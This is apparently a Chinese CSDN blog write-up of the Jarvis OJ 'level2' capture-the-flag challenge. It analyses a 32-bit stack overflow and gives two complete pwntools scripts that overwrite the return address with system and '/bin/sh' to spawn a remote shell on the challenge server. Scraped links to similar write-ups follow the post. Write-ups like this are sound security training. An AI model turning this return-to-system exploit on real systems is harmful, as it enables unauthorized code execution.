Jarvis oj level2 wp

最新推荐文章于 2023-08-20 20:27:09 发布
最新推荐文章于 2023-08-20 20:27:09 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: pwn Jarvis OJ pwn题目 wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/85407917
版权

检查防护
在这里插入图片描述
开启了NX,没开启PIE和canary防护,程序本身的基址不变。

放IDA里看一下
在这里插入图片描述
程序本身调用了system函数,那么PLT表里就一定有这个函数。
看下vulner函数
在这里插入图片描述
很显然栈溢出。
IDA查找下字符串:
在这里插入图片描述
发现了/bin/sh字符串,而且在本身程序的data段,由于没有开启PIE,那么这个字符串的首地址是不会变的。
在这里插入图片描述
简单计算下,首地址是0x0804A024,

算下溢出点是多少
在这里插入图片描述
很显然0x88+0x4=140
那么就可以写exp了:
这个是自己找地址的写法,也可以直接用pwntools的ELF模块,下面还有一个直接用pwntools的ELF的 exp

from pwn import*

elf=ELF("level2.54931449c557d0551c4fc2a10f4778a1")

a=remote("pwn2.jarvisoj.com","9878")

a.recvuntil("Input:\n")

#system_addr=elf.symbols["system"]

#shell_addr=next(elf.search("/bin/sh"))

payload='A'*140+p32(0x08048320)+p32(0x1)+p32(0x0804A024)

a.send(payload)

a.interactive()

这个是用ELF模块的:

from pwn import*

elf=ELF("level2.54931449c557d0551c4fc2a10f4778a1")

a=remote("pwn2.jarvisoj.com","9878")

a.recvuntil("Input:\n")

system_addr=elf.symbols["system"]

shell_addr=next(elf.search("/bin/sh"))

payload='A'*140+p32(system_addr)+p32(0x1)+p32(shell_addr)

a.send(payload)

a.interactive()
dittozzz
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
JarvisOJ.docx
03-10
JarvisOJ
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_level2【BUUCTF】
qq_41696518的博客
08-26 577
jarvisoj_level2【BUUCTF】
jarvisoj_level2
m0_55086916的博客
11-29 596
第一个p32(0x08048320)是function函数的返回地址,第二个是system函数的返回地址,p32(0x0804a024)是system函数的第一个参数。注意到这里可以利用栈溢出漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把栈给覆盖掉。于是想把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址。
jarvisoj-level2
qq_35661990的博客
11-09 1338
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
[CTF]jarvisoj_level2
凉水的博客
01-12 478
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis声音.zip
09-28
钢铁侠贾维斯提示声QQ提示声钢铁侠贾维斯提示声QQ提示声电脑提示音钢铁侠贾维斯提示声QQ提示声钢铁侠贾维斯提示声QQ提示声电脑提示音
jarvis音频.zip
07-31
贾维斯各种音频,适用于Windows系统,苹果Siri等等,压缩包里放置的有更改window系统启动电脑声音的软件,献给所有喜欢钢铁侠的朋友。
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 578
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
jarvisoj_level2题解
OrientalGlass的博客
01-08 190
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
【BUUCTF - PWNjarvisoj_level2
古月浪子的博客
04-05 636
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
BUUCTF jarvisoj_level2 题解
最新发布
qq_51802916的博客
08-20 242
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 459
[buuctf]jarvisoj_level2
jarvisoj level1-2
sun的博客
10-03 610
level1 先使用checksec查询一下这个保护机制没有开启任何保护 [*] '/home/sun/Desktop/1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x...
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 714
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
jarvisoj_level2_x64
、moddemod
06-17 512
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值